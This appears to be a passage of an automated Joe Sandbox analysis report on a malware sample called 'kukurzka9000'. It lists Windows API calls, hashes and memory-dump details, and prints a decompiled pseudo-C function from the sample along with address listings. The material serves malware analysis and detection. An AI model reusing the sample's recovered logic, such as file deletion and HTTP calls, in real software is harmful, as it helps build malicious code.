                                                                                                                                                                        • Opcode ID: 72788095e3ba856c56753af6b7a68af839d158276ac543cc7c9517f84d2339a1
                                                                                                                                                                        • Instruction ID: b8286005281a73cbe8d08d9cb944dcf9303b177256710907798fd4d6617c6d53
                                                                                                                                                                        • Opcode Fuzzy Hash: 72788095e3ba856c56753af6b7a68af839d158276ac543cc7c9517f84d2339a1
                                                                                                                                                                        • Instruction Fuzzy Hash: D3A1B371A00215AFEF14DBA5DD89FAE7BB9EF49310F004528F615B72D0DBB49910CB68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 02399A77: GlobalFree.KERNEL32(02391F22), ref: 02399AC4
                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 02393042
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0239316F
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 02393178
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0239317F
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02393186
                                                                                                                                                                        • FindClose.KERNEL32(00000002), ref: 023931AD
                                                                                                                                                                        • LocalFree.KERNEL32(00000002), ref: 023931B6
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 023931C6
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 023931CD
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 023931D4
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 023931DB
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 023931E4
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 023931ED
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 023931F4
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 023931FB
                                                                                                                                                                          • Part of subcall function 02399C12: LocalFree.KERNEL32(00000000,?,?,02391F22), ref: 02399C75
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Free$Local$File$CloseDeleteFindGlobalSize
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 952173178-1731603023
                                                                                                                                                                        • Opcode ID: c0af09b8467f81c6f5b6c21aa0467688919da5cab6ecacf54911a18db2b2d236
                                                                                                                                                                        • Instruction ID: 98a224a5b4a11725a385a0521e6156c5ac92915a972661be0865b850bc40c26f
                                                                                                                                                                        • Opcode Fuzzy Hash: c0af09b8467f81c6f5b6c21aa0467688919da5cab6ecacf54911a18db2b2d236
                                                                                                                                                                        • Instruction Fuzzy Hash: 60718371A00214AFDF14EBB6DD48EAE77BAEB89300F104968F515B72A0DB749D11CF68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 02399A77: GlobalFree.KERNEL32(02391F22), ref: 02399AC4
                                                                                                                                                                        • PathCombineW.SHLWAPI(00000000,00000000,0000002E), ref: 02395D2D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CombineFreeGlobalPath
                                                                                                                                                                        • String ID: .$pXet
                                                                                                                                                                        • API String ID: 1842026532-4267161970
                                                                                                                                                                        • Opcode ID: e2b1b369697f91e98e90e0f59b02c0883434508b7dc7d4233a499d6016bd9fa5
                                                                                                                                                                        • Instruction ID: 51092597c9b65c0c01d4802c4806e5db3b58634a809282a4433ef830f95e00a0
                                                                                                                                                                        • Opcode Fuzzy Hash: e2b1b369697f91e98e90e0f59b02c0883434508b7dc7d4233a499d6016bd9fa5
                                                                                                                                                                        • Instruction Fuzzy Hash: 5CC19EB1E00218AFDF04DFA5DD84AAEBBB9EB89310F004429EA15B73A0DB745D51CF64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: .$pXet
                                                                                                                                                                        • API String ID: 0-4267161970
                                                                                                                                                                        • Opcode ID: 8eb8ff996c082bd78e62886e718282b1ca5e0bd6b9d0ceec2433230310415ef2
                                                                                                                                                                        • Instruction ID: b6f4ec3d0955726d447f22be60732883de82d2bd7615b540109e73906b483a81
                                                                                                                                                                        • Opcode Fuzzy Hash: 8eb8ff996c082bd78e62886e718282b1ca5e0bd6b9d0ceec2433230310415ef2
                                                                                                                                                                        • Instruction Fuzzy Hash: 1191A571A00215AFEF089FA5DD48EBE7BB9EB49310F004868F915B72A0DB746D10CF68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,02396F57), ref: 02397D96
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,02396F57), ref: 02397DA4
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02397DBB
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02397DC6
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02397DD1
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,02396F57), ref: 02397E01
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,02396F57), ref: 02397E17
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,02396F57), ref: 02397E2F
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02397E3E
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02397E49
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02397E54
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,02396F57), ref: 02397E66
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02397E75
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02397E84
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal
                                                                                                                                                                        • String ID: iet$.dll$pXet
                                                                                                                                                                        • API String ID: 2826327444-1921264189
                                                                                                                                                                        • Opcode ID: 95061837a91f269392e0105e5022292588c8a9051f5e52f426446199278b41c2
                                                                                                                                                                        • Instruction ID: 7d4f55acfd323c69ca2eb4ce1a0d7973439eaa935303dd50fd6d397b2e892dca
                                                                                                                                                                        • Opcode Fuzzy Hash: 95061837a91f269392e0105e5022292588c8a9051f5e52f426446199278b41c2
                                                                                                                                                                        • Instruction Fuzzy Hash: BF81B2B1E102159BDF149FA9DE84A7EB7B9EB45700F044829E901F72D0DB74ED50CBA8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00408B01
                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00408C7F
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00408F66
                                                                                                                                                                          • Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
                                                                                                                                                                          • Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00408E46
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00408E51
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00408E58
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00408E5F
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00408E69
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00408F41
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00408F4B
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00408F55
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00408F5C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Free$Local$lstrlen$ClientCloseDeleteDesktopFileGlobalHandleRectWindow
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 2265433170-1731603023
                                                                                                                                                                        • Opcode ID: 42fc98a6e6a89340ea73cfcb9c6e7a19bfd64210cff79040dd24ad1ddd0e5be8
                                                                                                                                                                        • Instruction ID: 01ed2ab5b407dfc10e46f60f726f8b4f8e8024e8c2023dc9817dc03e66c0134a
                                                                                                                                                                        • Opcode Fuzzy Hash: 42fc98a6e6a89340ea73cfcb9c6e7a19bfd64210cff79040dd24ad1ddd0e5be8
                                                                                                                                                                        • Instruction Fuzzy Hash: 53D12E71104211AFE705DFA6DE44E2B7BF9EB89710F004D3DFA54E72A0DB7499208B6A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 02398075
                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 023981F3
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 023984DA
                                                                                                                                                                          • Part of subcall function 02399C12: LocalFree.KERNEL32(00000000,?,?,02391F22), ref: 02399C75
                                                                                                                                                                          • Part of subcall function 02399A77: GlobalFree.KERNEL32(02391F22), ref: 02399AC4
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 023983BA
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 023983C5
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 023983CC
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 023983D3
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 023983DD
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 023984B5
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 023984BF
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 023984C9
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 023984D0
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Free$Local$ClientCloseDeleteDesktopFileGlobalHandleRectWindow
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 2459997284-1731603023
                                                                                                                                                                        • Opcode ID: 167d8230b01a19888c30f1c1acb982bd4371131abcba0e45631bba1b62aed7e1
                                                                                                                                                                        • Instruction ID: c10d6586786743810925a9047bb261d020c88dcf48464979667a54f719ffdceb
                                                                                                                                                                        • Opcode Fuzzy Hash: 167d8230b01a19888c30f1c1acb982bd4371131abcba0e45631bba1b62aed7e1
                                                                                                                                                                        • Instruction Fuzzy Hash: F1D12DB1104210AFE705DFA6DE44E3B7BF9FB89710F004928FA54E7260D7B49920CB6A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00406BA0
                                                                                                                                                                        • wsprintfW.USER32 ref: 00406C85
                                                                                                                                                                        • lstrlenW.KERNEL32 ref: 00406C92
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00406CAF
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00406CE9
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00406CF4
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00406CFF
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00406D0B
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00406D12
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00406D19
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$DeleteFile$lstrlenwsprintf
                                                                                                                                                                        • String ID: FALSE$TRUE$pXet
                                                                                                                                                                        • API String ID: 4168217763-183093725
                                                                                                                                                                        • Opcode ID: 05357ced764b7ba51e890c53d3fe89fe9df73bb22b38b0f22364097a277e5634
                                                                                                                                                                        • Instruction ID: c49cda921923e69c5166418a1bf50fcb18860fb3db535930a4ec2c5e5cba73ac
                                                                                                                                                                        • Opcode Fuzzy Hash: 05357ced764b7ba51e890c53d3fe89fe9df73bb22b38b0f22364097a277e5634
                                                                                                                                                                        • Instruction Fuzzy Hash: 25619571A00214AFDF049FA1EE44EAE7BB5EF48310F108439F916B72A1DB759D20DB59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 21%
                                                                                                                                                                        			E00409906(void* _a4, short* _a8) {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				void* _v20;
                                                                                                                                                                        				void* _v24;
                                                                                                                                                                        				signed int _v28;
                                                                                                                                                                        				char _v32;
                                                                                                                                                                        				void* _v36;
                                                                                                                                                                        				char _v60;
                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                        				signed int _t55;
                                                                                                                                                                        				signed int _t60;
                                                                                                                                                                        				void* _t64;
                                                                                                                                                                        				signed int _t67;
                                                                                                                                                                        				void* _t71;
                                                                                                                                                                        				void* _t78;
                                                                                                                                                                        				void* _t100;
                                                                                                                                                                        				signed int _t105;
                                                                                                                                                                        				void* _t107;
                                                                                                                                                                        				void* _t108;
                                                                                                                                                                        				void* _t109;
                                                                                                                                                                        				void* _t110;
                                                                                                                                                                        				void* _t111;
                                                                                                                                                                        				void* _t112;
                                                                                                                                                                        				void* _t126;
                                                                                                                                                                        				signed int _t127;
                                                                                                                                                                        				signed int _t133;
                                                                                                                                                                        				void* _t144;
                                                                                                                                                                        				char _t149;
                                                                                                                                                                        				void* _t158;
                                                                                                                                                                        				void* _t162;
                                                                                                                                                                        				signed int _t163;
                                                                                                                                                                        				void* _t164;
                                                                                                                                                                        				void* _t166;
                                                                                                                                                                        				void* _t168;
                                                                                                                                                                        				void* _t173;
                                                                                                                                                                        				void* _t174;
                                                                                                                                                                        				signed int _t179;
                                                                                                                                                                        				void* _t184;
                                                                                                                                                                        
                                                                                                                                                                        				_t127 = 0;
                                                                                                                                                                        				_t53 =  *((intOrPtr*)( *0x40e18c))(_a4,  *0x40e430, _t162, _t126);
                                                                                                                                                                        				_t163 = _t53;
                                                                                                                                                                        				if(_t163 != 0) {
                                                                                                                                                                        					_t164 = _t163 + 0x10;
                                                                                                                                                                        					_t55 =  *((intOrPtr*)( *0x40e18c))(_t164,  *0x40e1f0);
                                                                                                                                                                        					__eflags = _t55;
                                                                                                                                                                        					if(_t55 == 0) {
                                                                                                                                                                        						L5:
                                                                                                                                                                        						_v16 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t164, _t174) + _t57);
                                                                                                                                                                        						_t60 = E0040A3E4(_t164,  &_v16, 0, _t127);
                                                                                                                                                                        						__eflags = _t60;
                                                                                                                                                                        						if(_t60 != 0) {
                                                                                                                                                                        							_t166 = _t164 + _t127 * 2 + 2;
                                                                                                                                                                        							_t64 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t166) + _t62);
                                                                                                                                                                        							_v8 = _t64;
                                                                                                                                                                        							_t179 =  *((intOrPtr*)( *0x40e18c))(_t166,  *0x40e20c) - _t166 >> 1;
                                                                                                                                                                        							_t67 = E0040A3E4(_t166,  &_v8, 0, _t179);
                                                                                                                                                                        							__eflags = _t67;
                                                                                                                                                                        							if(_t67 != 0) {
                                                                                                                                                                        								_t168 = _t166 + _t179 * 2 + 2;
                                                                                                                                                                        								_t71 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t168) + _t69);
                                                                                                                                                                        								_v12 = _t71;
                                                                                                                                                                        								__eflags = E0040A3E4(_t168,  &_v12, 0,  *((intOrPtr*)( *0x40e18c))(_t168,  *0x40e20c) - _t168 >> 1);
                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                        									_t78 =  *((intOrPtr*)( *0x40e044))(0x40, 0x5000);
                                                                                                                                                                        									_a4 =  *((intOrPtr*)( *0x40e13c))(_t78, _v8);
                                                                                                                                                                        									E00409064(__eflags,  &_a4);
                                                                                                                                                                        									E0040919C( &_a4);
                                                                                                                                                                        									E004090DC( *0x40e13c,  &_a4);
                                                                                                                                                                        									E00409265( &_a4);
                                                                                                                                                                        									E004092CF( &_v12,  &_a4);
                                                                                                                                                                        									E0040942A( &_a4);
                                                                                                                                                                        									E00409206(__eflags,  &_a4);
                                                                                                                                                                        									E00409498( &_a4);
                                                                                                                                                                        									E00409581(__eflags,  &_a4, _v12);
                                                                                                                                                                        									_t144 = _a4;
                                                                                                                                                                        									_v36 = _v16;
                                                                                                                                                                        									_v32 = _t144;
                                                                                                                                                                        									_v28 = 0;
                                                                                                                                                                        									asm("movsd");
                                                                                                                                                                        									asm("movsd");
                                                                                                                                                                        									asm("movsd");
                                                                                                                                                                        									_t100 =  *((intOrPtr*)( *0x40e08c))(_t144);
                                                                                                                                                                        									__eflags = _t100 - 0x40;
                                                                                                                                                                        									if(_t100 > 0x40) {
                                                                                                                                                                        										_t107 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        										_t108 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        										_t158 = 0x10;
                                                                                                                                                                        										_t109 = E0040A05F(_t107, _t158);
                                                                                                                                                                        										_v24 = _t109;
                                                                                                                                                                        										_t110 =  *((intOrPtr*)( *0x40e13c))(_t108,  *0x40e210);
                                                                                                                                                                        										_t173 = _v24;
                                                                                                                                                                        										_t111 = E0040A503(_t110, _t173);
                                                                                                                                                                        										_t149 =  *0x40e204; // 0x6587d8
                                                                                                                                                                        										_v28 = _v28 & 0x00000000;
                                                                                                                                                                        										_v32 = _t149;
                                                                                                                                                                        										_v24 = _t111;
                                                                                                                                                                        										_t112 = E00408619( &_v24);
                                                                                                                                                                        										_v20 = _t112;
                                                                                                                                                                        										_t184 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
                                                                                                                                                                        										 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t173, 0xffffffff, 0, 0, 0, 0);
                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                        										if(0 != 0) {
                                                                                                                                                                        											 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t173, 0xffffffff, _t184, 0, 0, 0);
                                                                                                                                                                        											__eflags = 0;
                                                                                                                                                                        											if(0 != 0) {
                                                                                                                                                                        												E00407EDB(_a8, _t184, 1,  &_v60, 0, 0, _v20,  &_v32);
                                                                                                                                                                        											}
                                                                                                                                                                        										}
                                                                                                                                                                        										LocalFree(_t184);
                                                                                                                                                                        										LocalFree(_v20);
                                                                                                                                                                        										LocalFree(_v24);
                                                                                                                                                                        										LocalFree(_t173);
                                                                                                                                                                        									}
                                                                                                                                                                        									LocalFree(_a4);
                                                                                                                                                                        									LocalFree(_v8);
                                                                                                                                                                        									LocalFree(_v12);
                                                                                                                                                                        									L19:
                                                                                                                                                                        									LocalFree(_v16);
                                                                                                                                                                        									_t105 = 1;
                                                                                                                                                                        									L20:
                                                                                                                                                                        									return _t105;
                                                                                                                                                                        								}
                                                                                                                                                                        								LocalFree(_v8);
                                                                                                                                                                        								LocalFree(_v12);
                                                                                                                                                                        								L9:
                                                                                                                                                                        								_push(0xfffffffc);
                                                                                                                                                                        								L10:
                                                                                                                                                                        								_pop(1);
                                                                                                                                                                        								goto L19;
                                                                                                                                                                        							}
                                                                                                                                                                        							LocalFree(_v8);
                                                                                                                                                                        							goto L9;
                                                                                                                                                                        						}
                                                                                                                                                                        						_push(0xfffffffd);
                                                                                                                                                                        						goto L10;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t133 = _t55 - _t164;
                                                                                                                                                                        					__eflags = _t133;
                                                                                                                                                                        					_t127 = _t133 >> 1;
                                                                                                                                                                        					if(_t133 >= 0) {
                                                                                                                                                                        						goto L5;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t105 = 0xfffffffe;
                                                                                                                                                                        					goto L20;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t105 = _t53 | 0xffffffff;
                                                                                                                                                                        				goto L20;
                                                                                                                                                                        			}










































                                                                                                                                                                        0x00409919
                                                                                                                                                                        0x0040991e
                                                                                                                                                                        0x00409920
                                                                                                                                                                        0x00409924
                                                                                                                                                                        0x00409939
                                                                                                                                                                        0x0040993d
                                                                                                                                                                        0x0040993f
                                                                                                                                                                        0x00409941
                                                                                                                                                                        0x00409953
                                                                                                                                                                        0x0040996f
                                                                                                                                                                        0x00409974
                                                                                                                                                                        0x0040997b
                                                                                                                                                                        0x0040997d
                                                                                                                                                                        0x00409991
                                                                                                                                                                        0x0040999c
                                                                                                                                                                        0x004099a4
                                                                                                                                                                        0x004099b8
                                                                                                                                                                        0x004099be
                                                                                                                                                                        0x004099c5
                                                                                                                                                                        0x004099c7
                                                                                                                                                                        0x004099e8
                                                                                                                                                                        0x004099f3
                                                                                                                                                                        0x004099fb
                                                                                                                                                                        0x00409a18
                                                                                                                                                                        0x00409a1a
                                                                                                                                                                        0x00409a36
                                                                                                                                                                        0x00409a44
                                                                                                                                                                        0x00409a4b
                                                                                                                                                                        0x00409a54
                                                                                                                                                                        0x00409a5d
                                                                                                                                                                        0x00409a66
                                                                                                                                                                        0x00409a6f
                                                                                                                                                                        0x00409a78
                                                                                                                                                                        0x00409a81
                                                                                                                                                                        0x00409a8a
                                                                                                                                                                        0x00409a96
                                                                                                                                                                        0x00409a9b
                                                                                                                                                                        0x00409aa7
                                                                                                                                                                        0x00409aaf
                                                                                                                                                                        0x00409ab2
                                                                                                                                                                        0x00409ab5
                                                                                                                                                                        0x00409ab7
                                                                                                                                                                        0x00409ab8
                                                                                                                                                                        0x00409ab9
                                                                                                                                                                        0x00409abe
                                                                                                                                                                        0x00409ac1
                                                                                                                                                                        0x00409ad4
                                                                                                                                                                        0x00409ae1
                                                                                                                                                                        0x00409ae5
                                                                                                                                                                        0x00409aea
                                                                                                                                                                        0x00409afc
                                                                                                                                                                        0x00409aff
                                                                                                                                                                        0x00409b01
                                                                                                                                                                        0x00409b08
                                                                                                                                                                        0x00409b0d
                                                                                                                                                                        0x00409b13
                                                                                                                                                                        0x00409b17
                                                                                                                                                                        0x00409b1d
                                                                                                                                                                        0x00409b20
                                                                                                                                                                        0x00409b32
                                                                                                                                                                        0x00409b3d
                                                                                                                                                                        0x00409b4e
                                                                                                                                                                        0x00409b50
                                                                                                                                                                        0x00409b52
                                                                                                                                                                        0x00409b69
                                                                                                                                                                        0x00409b6b
                                                                                                                                                                        0x00409b6d
                                                                                                                                                                        0x00409b84
                                                                                                                                                                        0x00409b89
                                                                                                                                                                        0x00409b6d
                                                                                                                                                                        0x00409b8d
                                                                                                                                                                        0x00409b96
                                                                                                                                                                        0x00409b9f
                                                                                                                                                                        0x00409ba6
                                                                                                                                                                        0x00409ba6
                                                                                                                                                                        0x00409baf
                                                                                                                                                                        0x00409bb8
                                                                                                                                                                        0x00409bc1
                                                                                                                                                                        0x00409bc7
                                                                                                                                                                        0x00409bca
                                                                                                                                                                        0x00409bd0
                                                                                                                                                                        0x00409bd3
                                                                                                                                                                        0x00409bd6
                                                                                                                                                                        0x00409bd6
                                                                                                                                                                        0x00409a1f
                                                                                                                                                                        0x004099cc
                                                                                                                                                                        0x004099cc
                                                                                                                                                                        0x004099d2
                                                                                                                                                                        0x004099d4
                                                                                                                                                                        0x004099d4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004099d4
                                                                                                                                                                        0x004099cc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004099cc
                                                                                                                                                                        0x0040997f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040997f
                                                                                                                                                                        0x00409945
                                                                                                                                                                        0x00409945
                                                                                                                                                                        0x00409947
                                                                                                                                                                        0x00409949
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040994d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040994d
                                                                                                                                                                        0x00409926
                                                                                                                                                                        0x00000000

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 0-1731603023
                                                                                                                                                                        • Opcode ID: 04f12ae8814da058343c2e57629071c3ba8950ef59b0fb61412e087f2168b86d
                                                                                                                                                                        • Instruction ID: d553b19b407f17417f5105702fe08a0418c2ec115b386657b372b4e652bae7b9
                                                                                                                                                                        • Opcode Fuzzy Hash: 04f12ae8814da058343c2e57629071c3ba8950ef59b0fb61412e087f2168b86d
                                                                                                                                                                        • Instruction Fuzzy Hash: FA81D5B1900205BFDB00DBA6DD45DAE7BB9EB84310B00493AF914F72D1DB78AD11CBA9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • HttpSendRequestW.WININET(00000000,?,00000000), ref: 00407E0E
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00407E39
                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00407E45
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00407E4C
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000001), ref: 00407E6E
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000001), ref: 00407EA6
                                                                                                                                                                        • LocalFree.KERNEL32(0000002F), ref: 00407EBA
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00407EC3
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00407ECA
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
